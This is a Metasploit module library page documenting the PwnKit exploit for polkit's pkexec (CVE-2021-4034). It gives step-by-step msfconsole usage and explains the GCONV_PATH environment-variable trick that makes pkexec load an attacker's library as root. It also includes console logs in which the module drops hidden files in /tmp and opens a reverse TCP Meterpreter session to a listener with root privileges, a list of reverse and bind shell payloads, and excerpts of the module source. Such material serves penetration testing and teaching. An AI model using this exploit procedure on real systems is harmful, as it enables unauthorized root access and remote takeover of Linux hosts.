Local Privilege Escalation in polkits pkexec - Metasploit


This page contains detailed information about how to use the exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: Local Privilege Escalation in polkits pkexec
Module: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
Source code: modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb
Disclosure date: 2022-01-25
Last modification time: 2022-03-09 11:06:26 +0000
Supported architecture(s): -
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2021-4034

A bug exists in the polkit pkexec binary in how it processes arguments. If the binary is provided with no arguments, it will continue to process environment variables as argument variables, but without any security checking. By using the execve call we can specify a null argument list and populate the proper environment variables. This exploit is architecture independent.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage

Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
msf exploit(cve_2021_4034_pwnkit_lpe_pkexec) > show targets
    ... a list of targets ...
msf exploit(cve_2021_4034_pwnkit_lpe_pkexec) > set TARGET target-id
msf exploit(cve_2021_4034_pwnkit_lpe_pkexec) > show options
    ... show and set options ...
msf exploit(cve_2021_4034_pwnkit_lpe_pkexec) > set SESSION session-id
msf exploit(cve_2021_4034_pwnkit_lpe_pkexec) > exploit

Required Options

  • SESSION: The session to run this module on

Knowledge Base

Vulnerable Application

The check method uses the exploit without a payload. Vulnerable versions of pkexec give the error that the shell was not in the shells folder if you pass in the exploit without a payload to execute. Patched versions exit and give the help output if executed with no arguments.

First Patched Ubuntu packages:

  • 20.04: 0.105-26ubuntu1.2
  • 21.10: 0.105-31ubuntu0.1
  • 18.04: 0.105-20ubuntu0.18.04.6

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

First Patched Debian Packages:

  • stretch: 0.105-18+deb9u2
  • buster: 0.105-25+deb10u1
  • bullseye: 0.105-31+deb11u1

Source: https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

Vulnerable CentOS Packages:

  • polkit-0.112-5.ael7b
  • polkit-0.112-13.p1.el7a
  • polkit-0.96-2.el6
  • polkit-0.96-2.el6_0.1
  • polkit-0.96-5.el6_4
  • polkit-0.96-7.el6
  • polkit-0.96-7.el6_6.1
  • polkit-0.96-11.el6
  • polkit-0.96-11.el6_10.1
  • polkit-0.112-1.el7
  • polkit-0.112-5.el7
  • polkit-0.112-6.el7_2
  • polkit-0.112-7.el7_2.2
  • polkit-0.112-7.el7_2.3
  • polkit-0.112-7.el7_2
  • polkit-0.112-9.el7
  • polkit-0.112-11.el7_3
  • polkit-0.112-12.el7_3
  • polkit-0.112-12.el7_4.1
  • polkit-0.112-14.el7
  • polkit-0.112-14.el7_5.1
  • polkit-0.112-17.el7
  • polkit-0.112-18.el7
  • polkit-0.112-18.el7_6.1
  • polkit-0.112-18.el7_6.2
  • polkit-0.112-22.el7
  • polkit-0.112-22.el7_7.1
  • polkit-0.112-26.el7
  • polkit-0.115-6.el8
  • polkit-0.115-9.el8
  • polkit-0.115-9.el8_1.1
  • polkit-0.115-11.el8
  • polkit-0.115-11.el8_2.1
  • polkit-0.115-11.el8_3.2
  • polkit-0.115-11.el8_4.1
  • polkit-0.115-12.el8

    • Source: https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/

    Fedora:

    Fedora should be vulnerable, and the pkexec binary will respond like it is vulnerable, but the exploit will fail. I don't know why, but it still fails with SELinux disabled or using the original PoCs that compiled a binary on target. The check method just bails if it sees Fedora.

    msf6 payload(linux/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer     : localhost.localdomain
OS           : Fedora 33 (Linux 5.8.15-301.fc33.x86_64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: msfuser
meterpreter > shell
Process 2396 created.
Channel 5 created.
sestatus
SELinux status:                 disabled
exit
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(linux/x64/meterpreter/reverse_tcp) > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec 
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set session 1
session => 1
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set verbose true
verbose => true
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set auto
set autocheck                 set autorunscript             set autounhookprocess         
set autoloadstdapi            set autosysteminfo            set autoverifysessiontimeout  
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > set autoCheck false
autoCheck => false
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > check

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.117
[*] The target is not exploitable. Fedora is not supported
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[!] AutoCheck is disabled, proceeding with exploitation
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.wqogdpzub
[*] /tmp/.wqogdpzub created
[*] Writing '/tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.wqogdpzub
[*] Running python /tmp/.wqogdpzub/.skihoukdb /usr/bin/pkexec /tmp/.wqogdpzub/kfmlrhrqi/kfmlrhrqi.so kfmlrhrqi jdtnqzvqn
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “jdtnqzvqn”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[*] Exploit completed, but no session was created.

    RedHat:

    Untested on Redhat, but I assume similar to Fedora.

    Summary

    Polkit's pkexec binary is a bit like sudo in that it allows users to run an application as another user. For instance, when you run something like pkexec ls you'll be prompted for the root user's password. Because it allows elevated launching of programs, pkexec runs as root.

    Processes that run like this are considered special and are run in a Secure-execution mode, which causes the dynamic linker (ld.so) to strip out problematic environment variables that could introduce security concerns. One of these "untrusted" environment variables stripped out by the linker is GCONV_PATH, which sets the location for text conversion libraries. If a binary needs to convert a text string to a different encoding, it will load/execute the library specified by GCONV_PATH.

    For example, if we could get pkexec to run with the environment string GCONV_PATH=./exploit, pkexec would load and execute the exploit as root if we were able to coerce the binary to use an unknown charset. This is why the dynamic linker prevents such an environment variable from being passed into secure-execution mode binaries.

    The check to prevent GCONV_PATH environment variables is done when a program loads, so if we can modify the environment variables after the program loads, we could add it, but as the process runs as root, we could not change those values ourselves.

    This is where the logic flaw in pkexec can be abused. pkexec runs through each argument it is passed and calls g_find_program_in_path which takes a filename and replaces the filename with the full path to the file, according to its PATH environment. Since there can be multiple binaries, this is done within a loop. The specific bug in pkexec is that the loop will always run at least once, even if the number of arguments is 0.

    If the number of arguments is 0, then it will still attempt to resolve the element it pulls from memory at the location the first argument would have been located. Because of how the stack is structured, environment variables are located right after argument values in memory, so if there are no argument values, then the environment values are there. The exploit works by coercing g_find_program_in_path into writing GCONV_PATH=./exploit into the first slot in the environment list.

    We can do this by creating a folder in the PATH called GCONV_PATH=. and within that folder, place a file named abc. We also add the directory GCONV_PATH to the PATH environment variable. Now, when we launch pkexec without any arguments, but with abc as the first environment variable and PATH=GCONV_PATH= as the second, g_find_program_in_path will look for abc in the folder GCONV_PATH=. and find it. It will then overwrite the first environment variable withe the full path to the file as it exists in our PATH: GCONV_PATH=./abc or exactly what we'd like to have as our environment variable. Now, if we can coerce pkexec to use an unknown charset, it will load the library ./abc.so which we'll make the name of our payload.

    We can coerce the loading of the .so by adding another environment variable declaring some unknown charset: CHARSET=garbage would work fine if we could get pkexec to need to write a log. We can get it to write a log by giving a bad value for something it depends on. In our case, we're using the SHELL environment variable.

    So, to sum up, if we give pkexec a bad value for the SHELL environment variable and an unknown charset to encode, it will load the .so file specified by GCONV_PATH and run it as root in an attempt to encode to the unknown charset.

    To break it down, we need to place a .so payload binary in our current working directory called abc.so and call pkexec with no arguments and the environment values:

    abc

    PATH=GCONV_PATH=.

    SHELL=/garbage

    CHARSET=garbage

    Once g_find_program_in_path runs, the environment variables will be changed to:

    GCONV_PATH=./abc.so

    PATH=GCONV_PATH=.

    SHELL=/garbage

    CHARSET=garbage

    The result will be that pkexec errors while trying to encode test to the non-existant charset, causing it to load the provided abc.so file in the root context.

    Verification

    • Start msfconsole
    • Get a non-root shell/meterpreter
    • use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
    • set SESSION <session-id>
    • set LHOST <lhost-IP>
    • run

    Options

    WRITEABLE_DIR

    This indicates the location where you would like the payload and exploit stored, as well as serving as a location to store the various files and directories created by the exploit itself. The default value is /tmp

    PKEXEC_PATH

    This indicates the location of the pkexec binary. Normally, the module can find the it without help. It defaults to nil.

    Advanced Options

    FinalDir

    This indicates the starting directory for the new root-enabled session. The module deletes the working directory out from under the running payload, so the current working directory for the new session will not exist, and that can result in odd errors, so we just change to a directory that does exist before user interaction. It defaults to /

    Scenarios

    msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION       1                yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   x86_64


msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_railgun_api
[*] Started reverse TCP handler on 10.5.135.101:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Found pkexec version 0.105
[*] Determined host os is Ubuntu
[*] Polkit package version = 0.105-26ubuntu1
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.pacfbr
[*] /tmp/.pacfbr created
[!] Verify cleanup of /tmp/.pacfbr
[*] Running python3 /tmp/.pacfbr/.jxkiwyj /usr/bin/pkexec /tmp/.pacfbr/khmtpqj/khmtpqj.so khmtpqj mbbidsfl
[*] GLib: Cannot convert message: Could not open converter from “UTF-8” to “mbbidsfl”
The value for the SHELL variable was not found the /etc/shells file

This incident has been reported.
[+] The target is vulnerable.
[*] Checking for pkexec
[*] Checking for /usr/bin/pkexec
[*] Found pkexec here: /usr/bin/pkexec
[*] Creating directory /tmp/.lukbdme
[*] /tmp/.lukbdme created
[*] Writing '/tmp/.lukbdme/rnaxcz/rnaxcz.so' (548 bytes) ...
[!] Verify cleanup of /tmp/.lukbdme
[*] Running python3 /tmp/.lukbdme/.iwksanwva /usr/bin/pkexec /tmp/.lukbdme/rnaxcz/rnaxcz.so rnaxcz jnagcbkqds
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3012548 bytes) to 10.5.132.107
[+] Deleted /tmp/.lukbdme/rnaxcz/rnaxcz.so
[+] Deleted /tmp/.lukbdme/.iwksanwva
[!] Attempting to delete working directory /tmp/.lukbdme
[!] Attempting to delete working directory /tmp/.lukbdme
[*] Meterpreter session 3 opened (10.5.135.101:4444 -> 10.5.132.107:54758 ) at 2022-03-01 14:40:18 -0600

meterpreter > sysinfo
Computer     : 10.5.132.107
OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
meterpreter > pwd
/
meterpreter >

    Reference: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt

Go back to menu.

Msfconsole Usage

Here is how the linux/local/cve_2021_4034_pwnkit_lpe_pkexec exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec

[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show info

       Name: Local Privilege Escalation in polkits pkexec
     Module: exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec
   Platform: Linux
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-01-25

Provided by:
  Qualys Security
  Andris Raugulis
  Dhiraj Mishra
  bwatters-r7

Module side effects:
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   x86_64
  1   x86
  2   aarch64

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  PKEXEC_PATH                    no        The path to pkexec binary
  SESSION                        yes       The session to run this module on
  WRITABLE_DIR  /tmp             yes       A directory where we can write files

Payload information:

Description:
  A bug exists in the polkit pkexec binary in how it processes 
  arguments. If the binary is provided with no arguments, it will 
  continue to process environment variables as argument variables, but 
  without any security checking. By using the execve call we can 
  specify a null argument list and populate the proper environment 
  variables. This exploit is architecture independent.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2021-4034
  https://www.whitesourcesoftware.com/resources/blog/polkit-pkexec-vulnerability-cve-2021-4034/
  https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
  https://github.com/arthepsy/CVE-2021-4034
  https://www.ramanean.com/script-to-detect-polkit-vulnerability-in-redhat-linux-systems-pwnkit/
  https://github.com/cyberark/PwnKit-Hunter/blob/main/CVE-2021-4034_Finder.py

Module Options

This is a complete list of options available in the linux/local/cve_2021_4034_pwnkit_lpe_pkexec exploit:

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show options

Module options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   PKEXEC_PATH                    no        The path to pkexec binary
   SESSION                        yes       The session to run this module on
   WRITABLE_DIR  /tmp             yes       A directory where we can write files

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.170  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   x86_64

Advanced Options

Here is a complete list of advanced options supported by the linux/local/cve_2021_4034_pwnkit_lpe_pkexec exploit:

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show advanced

Module advanced options (exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AllowNoCleanup          false            no        Allow exploitation without the possibility of cleaning up files
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   FinalDir                /                yes       A directory to move to after the exploit completes
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transport
                                                           s
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   MeterpreterTryToFork         false            no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                true             no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                true             no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go thr
                                                           ough proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncodi
                                                           ng is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets

Here is a list of targets (platforms and systems) which the linux/local/cve_2021_4034_pwnkit_lpe_pkexec module can exploit:

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   x86_64
   1   x86
   2   aarch64

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/cve_2021_4034_pwnkit_lpe_pkexec exploit:

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show payloads

Compatible Payloads
===================

   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   payload/generic/custom                                         normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/generic/ssh/interact                                   normal  No     Interact with Established SSH Connection
   4   payload/linux/x64/exec                                         normal  No     Linux Execute Command
   5   payload/linux/x64/meterpreter/bind_tcp                         normal  No     Linux Mettle x64, Bind TCP Stager
   6   payload/linux/x64/meterpreter/reverse_tcp                      normal  No     Linux Mettle x64, Reverse TCP Stager
   7   payload/linux/x64/meterpreter_reverse_http                     normal  No     Linux Meterpreter, Reverse HTTP Inline
   8   payload/linux/x64/meterpreter_reverse_https                    normal  No     Linux Meterpreter, Reverse HTTPS Inline
   9   payload/linux/x64/meterpreter_reverse_tcp                      normal  No     Linux Meterpreter, Reverse TCP Inline
   10  payload/linux/x64/pingback_bind_tcp                            normal  No     Linux x64 Pingback, Bind TCP Inline
   11  payload/linux/x64/pingback_reverse_tcp                         normal  No     Linux x64 Pingback, Reverse TCP Inline
   12  payload/linux/x64/shell/bind_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   13  payload/linux/x64/shell/reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   14  payload/linux/x64/shell_bind_ipv6_tcp                          normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   15  payload/linux/x64/shell_bind_tcp                               normal  No     Linux Command Shell, Bind TCP Inline
   16  payload/linux/x64/shell_bind_tcp_random_port                   normal  No     Linux Command Shell, Bind TCP Random Port Inline
   17  payload/linux/x64/shell_reverse_ipv6_tcp                       normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   18  payload/linux/x64/shell_reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options

Here is the full list of possible evasion options supported by the linux/local/cve_2021_4034_pwnkit_lpe_pkexec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/cve_2021_4034_pwnkit_lpe_pkexec) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

System architecture <ARCH> is not supported

Here is a relevant code snippet related to the "System architecture <ARCH> is not supported" error message:

109:	
110:	  def check
111:	    # Is the arch supported?
112:	    arch = kernel_hardware
113:	    unless arch.include?('x86_64') || arch.include?('aarch64') || arch.include?('x86')
114:	      return CheckCode::Safe("System architecture #{arch} is not supported")
115:	    end
116:	
117:	    # check the binary
118:	    pkexec_path = datastore['PKEXEC_PATH']
119:	    pkexec_path = find_pkexec if pkexec_path.empty?

The pkexec binary was not found; try populating PkexecPath

Here is a relevant code snippet related to the "The pkexec binary was not found; try populating PkexecPath" error message:

115:	    end
116:	
117:	    # check the binary
118:	    pkexec_path = datastore['PKEXEC_PATH']
119:	    pkexec_path = find_pkexec if pkexec_path.empty?
120:	    return CheckCode::Safe('The pkexec binary was not found; try populating PkexecPath') if pkexec_path.nil?
121:	
122:	    # we don't use the reported version, but it can help with troubleshooting
123:	    version_output = cmd_exec("#{pkexec_path} --version")
124:	    version_array = version_output.split(' ')
125:	    if version_array.length > 2

The pkexec binary setuid is not set

Here is a relevant code snippet related to the "The pkexec binary setuid is not set" error message:

125:	    if version_array.length > 2
126:	      pkexec_version = Rex::Version.new(version_array[2])
127:	      vprint_status("Found pkexec version #{pkexec_version}")
128:	    end
129:	
130:	    return CheckCode::Safe('The pkexec binary setuid is not set') unless setuid?(pkexec_path)
131:	
132:	    # Grab the package version if we can to help troubleshoot
133:	    sysinfo = get_sysinfo
134:	    begin
135:	      if sysinfo[:distro] =~ /[dD]ebian/

Fedora is not supported

Here is a relevant code snippet related to the "Fedora is not supported" error message:

154:	    end
155:	
156:	    if sysinfo[:distro] =~ /[fF]edora/
157:	      # Fedora should be supported, and it passes the check otherwise, but it just
158:	      # does not seem to work.  I am not sure why.  I have tried with SeLinux disabled.
159:	      return CheckCode::Safe('Fedora is not supported')
160:	    end
161:	
162:	    # run the exploit in check mode if everything looks right
163:	    if run_exploit(true)
164:	      return CheckCode::Vulnerable

The target does not appear vulnerable

Here is a relevant code snippet related to the "The target does not appear vulnerable" error message:

162:	    # run the exploit in check mode if everything looks right
163:	    if run_exploit(true)
164:	      return CheckCode::Vulnerable
165:	    end
166:	
167:	    return CheckCode::Safe('The target does not appear vulnerable')
168:	  end
169:	
170:	  def find_exec_program
171:	    return 'python' if command_exists?('python')
172:	    return 'python3' if command_exists?('python3')

Session already has root privileges. Set ForceExploit to override.

Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

174:	    return nil
175:	  end
176:	
177:	  def run_exploit(check)
178:	    if is_root? && !datastore['ForceExploit']
179:	      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
180:	    end
181:	
182:	    arch = kernel_hardware
183:	    vprint_status("Detected architecture: #{arch}")
184:	    if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))

Host/payload Mismatch; set target and select matching payload

Here is a relevant code snippet related to the "Host/payload Mismatch; set target and select matching payload" error message:

180:	    end
181:	
182:	    arch = kernel_hardware
183:	    vprint_status("Detected architecture: #{arch}")
184:	    if (arch.include?('x86_64') && payload.arch.first.include?('aarch')) || (arch.include?('aarch') && !payload.arch.first.include?('aarch'))
185:	      fail_with(Failure::BadConfig, 'Host/payload Mismatch; set target and select matching payload')
186:	    end
187:	
188:	    pkexec_path = datastore['PKEXEC_PATH']
189:	    if pkexec_path.empty?
190:	      pkexec_path = find_pkexec

The pkexec binary was not found; try populating PkexecPath

Here is a relevant code snippet related to the "The pkexec binary was not found; try populating PkexecPath" error message:

192:	
193:	    python_binary = find_exec_program
194:	
195:	    # Do we have the pkexec binary?
196:	    if pkexec_path.nil?
197:	      fail_with Failure::NotFound, 'The pkexec binary was not found; try populating PkexecPath'
198:	    end
199:	
200:	    # Do we have the python binary?
201:	    if python_binary.nil?
202:	      fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath'

The python binary was not found; try populating PythonPath

Here is a relevant code snippet related to the "The python binary was not found; try populating PythonPath" error message:

197:	      fail_with Failure::NotFound, 'The pkexec binary was not found; try populating PkexecPath'
198:	    end
199:	
200:	    # Do we have the python binary?
201:	    if python_binary.nil?
202:	      fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath'
203:	    end
204:	
205:	    unless writable? datastore['WRITABLE_DIR']
206:	      fail_with Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable"
207:	    end

<WRITABLE_DIR> is not writable

Here is a relevant code snippet related to the "<WRITABLE_DIR> is not writable" error message:

201:	    if python_binary.nil?
202:	      fail_with Failure::NotFound, 'The python binary was not found; try populating PythonPath'
203:	    end
204:	
205:	    unless writable? datastore['WRITABLE_DIR']
206:	      fail_with Failure::BadConfig, "#{datastore['WRITABLE_DIR']} is not writable"
207:	    end
208:	
209:	    local_dir = ".#{Rex::Text.rand_text_alpha_lower(6..12)}"
210:	    working_dir = "#{datastore['WRITABLE_DIR']}/#{local_dir}"
211:	    mkdir(working_dir)

Verify cleanup of <WORKING_DIR>

Here is a relevant code snippet related to the "Verify cleanup of <WORKING_DIR>" error message:

230:	
231:	    write_file(exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034.py'))
232:	    register_file_for_cleanup(exploit_file)
233:	
234:	    cmd = "#{python_binary} #{exploit_file} #{pkexec_path} #{payload_file} #{random_string_1} #{random_string_2}"
235:	    print_warning("Verify cleanup of #{working_dir}")
236:	    vprint_status("Running #{cmd}")
237:	    output = cmd_exec(cmd)
238:	
239:	    # Return to the old working directory before we delete working_directory
240:	    cd(@old_wd)

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • Qualys Security
  • Andris Raugulis
  • Dhiraj Mishra
  • bwatters-r7

Version

This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.